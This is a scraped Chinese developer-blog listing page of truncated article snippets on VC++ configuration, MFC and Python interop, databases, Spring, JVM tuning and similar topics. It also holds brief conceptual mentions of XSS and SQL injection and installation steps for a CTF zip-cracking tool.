目录1、概述2、SQLite数据库2.1、SQLite简介2.2、SQLite优缺点2.3、SQLite应用场景3、MySQL数据库3.1、MySQL简介3.2、MySQL优缺点3.3、MySQL应用场景4、PostgreSQL数据库4.1、PostgreSQL简介4.2、PostgreSQL优势4.3、PostgreSQL应用场景5、在实际系统中的选择VC++常用功能开发汇总（专栏文章列表，欢迎
MFC调用Python脚本 Laurel_Hou
1环境配置1.Python和MFC的运行环境要一致，要么都是32位，要么都是64位，最好在最开始的时候就统一，不然之后的控件访问可能会出问题2.添加环境变量变量名：PYTHONPATH变量值：Python安装目录/Lib变量名：PYTHONHOME变量值：Python安装目录重启后环境变量生效2MFC配置2.1目录设置项目-》属性-》VC++目录-》包含目录：python安装目录/include项
C++函数调用栈分布详解 dvlinker C/C++实战专栏 c++函数调用栈分布汇编代码
VC++常用功能开发汇总（专栏文章列表，欢迎订阅，持续更新...）https://blog.csdn.net/chenlycly/article/details/124272585<
VC++网络socket编程基础 job_baiqiang VC++网络socket 网络通信 C++
通常套接字有两种类型，一种是流式套接字（SOCK_STREAM）和数据报套接字（SOCK_DGRAM），分别对应TCP和UDP网络字节序是指TCP/IP协议中规定的数据传输使用格式，与之相对的字节顺序是主机字节顺序。网路字节序=大端在TCP/IP协议通信中，用户使用IP地址和端口号进行确定通信双方。套接字地址结构structsockaddr_in{shortsin_family;//指定地址家族即
C/C++和Python的交互小米minus python vc++python C++
C/C++和Python的交互VS2010添加python库：在工程上，右键，属性，VC++目录，包含目录和库目录分别设置为python文件夹下的include和libs就好了。提示找不到python26.lib或者dll的把他们放到vs下vc的lib和bin目录下应该就行了。例子：#测试脚本defhello(s):print"helloworld"printsdefarg(a,b):print'
c++调用静态函数的方法 ComputerInBook c++c++static c++调用静态函数
今天在写c++程序时，发新现在的gcc和vc++对于静态函数的调用方式有所改变，在旧标准的c++中，调用类的静态方法只能用类名::函数名的方式，在新的标准中，类的对像也可以像调用类的方法一样调用静态函数。示例如下：classDate{inty,m,d;public:Date();staticvoidPrint();};Date::Date(){}voidDate::Print(){printf("
bkcrack安装 x0da6h 网络安全
bkcrack是一款破解密码算法工具在ctf中主要用于破解压缩包密码本文主要介绍它的下载、安装方法先从github获取资源，windows中安装bkcrack还需要额外安装VC++的Redistributablegitclonehttps://github.com/kimci86/bkcrack.git然后配置cmake工具，需要用到cmake手动构建brack的项目代码pipinstallcma
代替Winform、Win32控件的一些界面框架Electron,QT等专注VB编程开发20年前端 c++ui 界面框架
以下是一些可以代替Winform、Win32控件，在VC++、VBA等EXE程序上用来做控件元素、表格数据绑定、窗口显示的WEBUI框架和工具：1.Electron特点：Electron是一个使用JavaScript、HTML和CSS构建跨平台桌面应用程序的框架。它允许开发者使用Web技术来创建桌面应用，具有良好的跨平台兼容性。适用场景：适用于需要快速开发跨平台桌面应用的场景，尤其是对UI灵活性和
visual studio中属性管理器常用配置通信.萌新 visual studio ide
VC++：包含目录：头文件的目录(修改了系统的include，属于全局的)库目录：lib文件的目录C/C++常规：附加包含目录：.h头文件的目录(只可以用在当前项目)链接器：常规附加库目录：lib文件的目录附加依赖项：lib库名称
VC++计算精解【6】 sakura_sea VC++2022计算精解 c++开发语言
文章目录二分法（BisectionMethod）数学原理c++参考文献二分法（BisectionMethod）数学原理如果一个函数f(x)f(x)f(x)在闭区间[a,b][a,b][a,b]上连续，且满足f(a)⋅f(b)#includeusingnamespacestd;//函数定义doublef(doublex){return3*pow(x,3)-7*pow(x,2)+11;}//二分法函数
linux sdl windows.h,Windows下的SDL安装奔跑吧linux内核 linux sdl windows.h
首先你要下载并安装SDL开发包。如果装在C盘下，路径为C:\SDL1.2.5如果在WINDOWS下。你可以按以下步骤：1.打开VC++，点击"Tools",Options2,点击directories选项3.选择"Includefiles"增加一个新的路径。"C:\SDL1.2.5\include"4，现在选择"Libaryfiles“增加"C:\SDL1.2.5\lib"现在你可以开始编写你的第
visual studio编写jni踩坑吉凶以情迁
这个东西说简单也简单，但是一不小心就如坑，以至于导致我多次踩坑都没成功，今天总算成功了！1、新建项目要使用空项目，否则有搞不完的坑等着你。2、添加java环境目录下的lib和lib\x86目录到工程的属性->配置属性->VC++目录->包含目录。3、配置属性生成格式为dll,而不是exe,4、配置输出的为x64而不是x86(你修改你会发现又要重新配置)5、头文件不用拖拽进去而是先放到项目目录然后添
vs2010添加头文件与库文件搜索目录 weixin_30550081 c/c++
1添加头文件搜索目录项目属性->配置属性->C/C++->常规->添加包含目录2添加库文件搜索项目属性->配置属性->VC++目录->库目录转载于:https://www.cnblogs.com/mingzhang/p/10635885.html
使用PotPlayer播放器查看软解和硬解4K高清视频时的CPU及GPU占用情况 dvlinker 开源组件及数据库技术 C/C++实战专栏 PotPlayer 视频播放器视频软解视频硬解 CPU GPU
目录1、问题说明2、PotPlayer播放器介绍3、视频的软解与硬解4、使用PotPlayer查看4K高清视频软解和硬解时的CPU占用情况4.1、使用软解时CPU和GPU占用情况4.2、使用硬解时CPU和GPU占用情况5、最后VC++常用功能开发汇总（专栏文章列表，欢迎订阅，持续更新...）https://blog.csdn.net/chenlycly/article/details/124272
c语言编程第一课,【北北的小程序】北のC语言第一课：helloworld 战神哥 c语言编程第一课
该楼层疑似违规已被系统折叠隐藏此楼查看此楼诶多！helloworld神马的，是我们要编写的第一个程序哟！话说第一课为什么不讲一些C语言的发展，优势什么的呢？因为LZ是java党！对C语言本身不是很了解，再加上，LZ作为一个年轻人，并不对这些东西感冒！(好学的同学如果想了解的话可以去自行度娘哟)C语言的代码编译器为VC++6.0VC++使用系列的东西老师在课上都会有提到，所以，安装VC++，创建工程
C++程序使用 STL 容器发生异常的常见原因分析与总结 dvlinker C/C++实战专栏 STL 容器迭代器删除元素遍历多线程 memset操作
目录1、概述2、使用STL列表中的元素越界3、遍历STL列表删除元素时对迭代器自加处理有问题引发越界4、更隐蔽的遍历STL列表删除元素时引发越界的场景5、多线程同时操作STL列表时没有加锁导致冲突6、对包含STL列表对象的结构体进行memset操作导致STL列表对象内存出异常7、最后VC++常用功能开发汇总（专栏文章列表，欢迎订阅，持续更新...）https://blog.csdn.net/che
VC++中CString和char*的相互转换寒江孤影d VC++c/c++
可参考的另外一篇文章：https://blog.csdn.net/luoweifu/article/details/20232379转自：https://blog.csdn.net/e_wsq/article/details/26307817网上转来的学习下1.传给未分配内存的constchar*（LPCTSTR）指针.CStringcstr(asdd);constchar*ch=(LPCTSTR
Visual Studio Code &C++ on macOS Hanbaxia C++C++MAC VSCODE 环境搭建 C++标准输入
一、预备知识1、理解mac环境的开发环境名称在开发环境中作用举例文本编辑器编写代码sublime,atom，visualstdiocode,nodepad++,vi/vim,emacs编译器文本编辑器写的代码翻译成机器代码链接器代码经编译二进制机器代码后，与系统提供的二进制库进行组合，生成一个可执行文件通常编译器和连接器一起的。vc/vc++,gcc/g++,clang+llvm项目管理工具管理程
Steam幻兽帕鲁搭建教程，如何选择服务器汇博科技-栗子服务器 github git
如何选购服务器大家可以根据自己的需求选购，大家最好选用物理服务器，可以找我参考一下。1到6人建议使用16H32G的20带宽的。12人以上建议大家使用E5的CPU内存64G的带宽50起步的。大家在选择服务器商的时候一定要选择正规的拥有资质的，这样售后会有保证，服务器还会稳定。搭建前需要准备下载steamcmd客户端安装VC++环境安装DX运行环境下载和配置服务器更新steamcmd并下载游戏，首先我
在vs中使用外部库，C++链接库可爱的小小小狼 C++c++开发语言
在vs中使用外部库：链接外部库（静态）使用外部库，需要.h文件.dll文件，我们需要将这两个文件的位置添加到vc++的包含目录和库目录，然后在链接器中的输入添加依赖。外部包含文件是使用#include"",包含文件时使用#include<>.（.dll文件是动态链接文件（动态链接将dll文件放置在工作目录），.lib是静态链接文件，使用时候会将代码复制到文件中）添加头文件路径告诉编译器在哪里可以找
cmake 添加头文件目录，链接动态、静态库雪域迷影
最近需要将Windows10系统下使用VS2017编译的VC++项目放到CentOSLinux服务器上跑，最简单的当然是使用cmake作为项目编译和管理工具了，这样就不需要写makefile了，使用cmake管理编译项目相对来说比较简单。遇到一个问题就是，由于我在CentOS7服务器上用的是普通用户账号，一些第三方库比如Boost库、yaml-cpp、mariadb、mariadb++、hired
iOS http封装 374016526 ios 服务器交互 http 网络请求
程序开发避免不了与服务器的交互，这里打包了一个自己写的http交互库。希望可以帮到大家。内置一个basehttp，当我们创建自己的service可以继承实现。 KuroAppBaseHttp *baseHttp = [[KuroAppBaseHttp alloc] init]; [baseHttp setDelegate:self]; [baseHttp
lolcat ：一个在 Linux 终端中输出彩虹特效的命令行工具 brotherlamp linux linux教程 linux视频 linux自学 linux资料
那些相信 Linux 命令行是单调无聊且没有任何乐趣的人们，你们错了，这里有一些有关 Linux 的文章，它们展示着 Linux 是如何的有趣和“淘气” 。在本文中，我将讨论一个名为“lolcat”的小工具 – 它可以在终端中生成彩虹般的颜色。何为 lolcat ? Lolcat 是一个针对 Linux，BSD 和 OSX 平台的工具，它类似于 cat 命令，并为 cat
MongoDB索引管理（1）——[九] eksliang mongodb MongoDB管理索引
转载请出自出处：http://eksliang.iteye.com/blog/2178427 一、概述数据库的索引与书籍的索引类似，有了索引就不需要翻转整本书。数据库的索引跟这个原理一样，首先在索引中找，在索引中找到条目以后，就可以直接跳转到目标文档的位置，从而使查询速度提高几个数据量级。不使用索引的查询称
Informatica参数及变量 18289753290 Informatica 参数变量
下面是本人通俗的理解，如有不对之处，希望指正 info参数的设置：在info中用到的参数都在server的专门的配置文件中（最好以parma）结尾下面的GLOBAl就是全局的，$开头的是系统级变量，$$开头的变量是自定义变量。如果是在session中或者mapping中用到的变量就是局部变量，那就把global换成对应的session或者mapping名字。 [GLOBAL] $Par
python 解析unicode字符串为utf8编码字符串酷的飞上天空 unicode
php返回的json字符串如果包含中文，则会被转换成\uxx格式的unicode编码字符串返回。在浏览器中能正常识别这种编码，但是后台程序却不能识别，直接输出显示的是\uxx的字符，并未进行转码。转换方式如下 >>> import json >>> q = '{"text":"\u4
Hibernate的总结永夜-极光 Hibernate
1.hibernate的作用,简化对数据库的编码,使开发人员不必再与复杂的sql语句打交道做项目大部分都需要用JAVA来链接数据库，比如你要做一个会员注册的页面，那么获取到用户填写的基本信后，你要把这些基本信息存入数据库对应的表中，不用hibernate还有mybatis之类的框架，都不用的话就得用JDBC，也就是JAVA自己的，用这个东西你要写很多的代码，比如保存注册信
SyntaxError: Non-UTF-8 code starting with '\xc4' 随便小屋 python
刚开始看一下Python语言，传说听强大的，但我感觉还是没Java强吧！写Hello World的时候就遇到一个问题，在Eclipse中写的，代码如下 ''' Created on 2014年10月27日 @author: Logic ''' print("Hello World!"); 运行结果 SyntaxError: Non-UTF-8
学会敬酒礼仪不做酒席菜鸟 aijuans 菜鸟
俗话说，酒是越喝越厚，但在酒桌上也有很多学问讲究，以下总结了一些酒桌上的你不得不注意的小细节。细节一：领导相互喝完才轮到自己敬酒。敬酒一定要站起来，双手举杯。细节二：可以多人敬一人，决不可一人敬多人，除非你是领导。细节三：自己敬别人，如果不碰杯，自己喝多少可视乎情况而定，比如对方酒量，对方喝酒态度，切不可比对方喝得少，要知道是自己敬人。细节四：自己敬别人，如果碰杯，一
《创新者的基因》读书笔记 aoyouzi 读书笔记《创新者的基因》
创新者的基因创新者的“基因”，即最具创意的企业家具备的五种“发现技能”：联想，观察，实验，发问，建立人脉。第一部分破坏性创新，从你开始第一章破坏性创新者的基因如何获得启示：发现以下的因素起到了催化剂的作用：(1) -个挑战现状的问题；(2)对某项技术、某个公司或顾客的观察；(3) -次尝试新鲜事物的经验或实验；(4)与某人进行了一次交谈，为他点醒
表单验证技术百合不是茶 JavaScript DOM对象 String对象事件
js最主要的功能就是验证表单,下面是我对表单验证的一些理解,贴出来与大家交流交流 ,数显我们要知道表单验证需要的技术点, String对象,事件,函数一:String对象;通常是对字符串的操作; 1,String的属性; 字符串.length;表示该字符串的长度; var str= "java"
web.xml配置详解之context-param bijian1013 java servlet web.xml context-param
一.格式定义： <context-param> <param-name>contextConfigLocation</param-name> <param-value>contextConfigLocationValue></param-value> </context-param> 作用：该元
Web系统常见编码漏洞（开发工程师知晓） Bill_chen sql PHP Web fckeditor 脚本
1.头号大敌：SQL Injection 原因：程序中对用户输入检查不严格，用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据，这就是所谓的SQL Injection，即SQL注入。本质: 对于输入检查不充分，导致SQL语句将用户提交的非法数据当作语句的一部分来执行。示例： String query = "SELECT id FROM users
【MongoDB学习笔记六】MongoDB修改器 bit1129 mongodb
本文首先介绍下MongoDB的基本的增删改查操作，然后，详细介绍MongoDB提供的修改器，以完成各种各样的文档更新操作 MongoDB的主要操作 show dbs 显示当前用户能看到哪些数据库 use foobar 将数据库切换到foobar show collections 显示当前数据库有哪些集合 db.people.update，update不带参数，可
提高职业素养，做好人生规划白糖_ 人生
培训讲师是成都著名的企业培训讲师，他在讲课中提出的一些观点很新颖，在此我收录了一些分享一下。注：讲师的观点不代表本人的观点，这些东西大家自己揣摩。 1、什么是职业规划：职业规划并不完全代表你到什么阶段要当什么官要拿多少钱，这些都只是梦想。职业规划是清楚的认识自己现在缺什么，这个阶段该学习什么，下个阶段缺什么，又应该怎么去规划学习，这样才算是规划。
国外的网站你都到哪边看？ bozch 技术网站国外
学习软件开发技术，如果没有什么英文基础，最好还是看国内的一些技术网站，例如：开源OSchina，csdn，iteye,51cto等等。个人感觉如果英语基础能力不错的话，可以浏览国外的网站来进行软件技术基础的学习，例如java开发中常用的到的网站有apache.org 里面有apache的很多Projects,springframework.org是spring相关的项目网站,还有几个感觉不错的
编程之美-光影切割问题 bylijinnan 编程之美
package a; public class DisorderCount { /**《编程之美》“光影切割问题” * 主要是两个问题： * 1.数学公式（设定没有三条以上的直线交于同一点）： * 两条直线最多一个交点，将平面分成了4个区域； * 三条直线最多三个交点，将平面分成了7个区域； * 可以推出：N条直线 M个交点，区域数为N+M+1。
关于Web跨站执行脚本概念 chenbowen00 Web 安全跨站执行脚本
跨站脚本攻击(XSS)是web应用程序中最危险和最常见的安全漏洞之一。安全研究人员发现这个漏洞在最受欢迎的网站,包括谷歌、Facebook、亚马逊、PayPal,和许多其他网站。如果你看看bug赏金计划,大多数报告的问题属于 XSS。为了防止跨站脚本攻击,浏览器也有自己的过滤器,但安全研究人员总是想方设法绕过这些过滤器。这个漏洞是通常用于执行cookie窃取、恶意软件传播,会话劫持,恶意重定向。在
[开源项目与投资]投资开源项目之前需要统计该项目已有的用户数 comsci 开源项目
现在国内和国外,特别是美国那边,突然出现很多开源项目,但是这些项目的用户有多少,有多少忠诚的粉丝,对于投资者来讲,完全是一个未知数,那么要投资开源项目,我们投资者必须准确无误的知道该项目的全部情况,包括项目发起人的情况,项目的维持时间..项目的技术水平,项目的参与者的势力,项目投入产出的效益.....
oracle alert log file（告警日志文件） daizj oracle 告警日志文件 alert log file
The alert log is a chronological log of messages and errors, and includes the following items: All internal errors (ORA-00600), block corruption errors (ORA-01578), and deadlock errors (ORA-00060)
关于 CAS SSO 文章声明 denger SSO
由于几年前写了几篇 CAS 系列的文章，之后陆续有人参照文章去实现，可都遇到了各种问题，同时经常或多或少的收到不少人的求助。现在这时特此说明几点： 1. 那些文章发表于好几年前了，CAS 已经更新几个很多版本了，由于近年已经没有做该领域方面的事情，所有文章也没有持续更新。 2. 文章只是提供思路，尽管 CAS 版本已经发生变化，但原理和流程仍然一致。最重要的是明白原理，然后
初二上学期难记单词 dcj3sjt126com english word
lesson 课 traffic 交通 matter 要紧；事物 happy 快乐的，幸福的 second 第二的 idea 主意；想法；意见 mean 意味着 important 重要的，重大的 never 从来，决不 afraid 害怕的 fifth 第五的 hometown 故乡，家乡 discuss 讨论；议论 east 东方的 agree 同意；赞成 bo
uicollectionview 纯代码布局, 添加头部视图 dcj3sjt126com Collection
#import <UIKit/UIKit.h> @interface myHeadView : UICollectionReusableView { UILabel *TitleLable; } -(void)setTextTitle; @end #import "myHeadView.h" @implementation m
N 位随机数字串的 JAVA 生成实现 FX夜归人 java Math 随机数 Random
/** * 功能描述随机数工具类<br /> * @author FengXueYeGuiRen * 创建时间 2014-7-25<br /> */ public class RandomUtil { // 随机数生成器 private static java.util.Random random = new java.util.R
Ehcache（09）——缓存Web页面 234390216 ehcache 页面缓存
页面缓存目录 1 SimplePageCachingFilter 1.1 calculateKey 1.2 可配置的初始化参数 1.2.1 cach
spring中少用的注解@primary解析 jackyrong primary
这次看下spring中少见的注解@primary注解，例子 @Component public class MetalSinger implements Singer{ @Override public String sing(String lyrics) { return "I am singing with DIO voice
Java几款性能分析工具的对比 lbwahoo java
Java几款性能分析工具的对比摘自：http://my.oschina.net/liux/blog/51800 在给客户的应用程序维护的过程中，我注意到在高负载下的一些性能问题。理论上，增加对应用程序的负载会使性能等比率的下降。然而，我认为性能下降的比率远远高于负载的增加。我也发现，性能可以通过改变应用程序的逻辑来提升，甚至达到极限。为了更详细的了解这一点，我们需要做一些性能
JVM参数配置大全 nickys jvm 应用服务器
JVM参数配置大全 /usr/local/jdk/bin/java -Dresin.home=/usr/local/resin -server -Xms1800M -Xmx1800M -Xmn300M -Xss512K -XX:PermSize=300M -XX:MaxPermSize=300M -XX:SurvivorRatio=8 -XX:MaxTenuringThreshold=5 -
搭建 CentOS 6 服务器(14) - squid、Varnish rensanning varnish
（一）squid 安装 # yum install httpd-tools -y # htpasswd -c -b /etc/squid/passwords squiduser 123456 # yum install squid -y 设置 # cp /etc/squid/squid.conf /etc/squid/squid.conf.bak # vi /etc/
Spring缓存注解@Cache使用 tom_seed spring
参考资料 http://www.ibm.com/developerworks/cn/opensource/os-cn-spring-cache/ http://swiftlet.net/archives/774 缓存注解有以下三个： @Cacheable @CacheEvict @CachePut
dom4j解析XML时出现"java.lang.noclassdeffounderror: org/jaxen/jaxenexception"错误 xp9802
java.lang.NoClassDefFoundError: org/jaxen/JaxenExc 关键字: java.lang.noclassdeffounderror: org/jaxen/jaxenexception 使用dom4j解析XML时，要快速获取某个节点的数据，使用XPath是个不错的方法，dom4j的快速手册里也建议使用这种方式执行时却抛出以下异常： Exceptio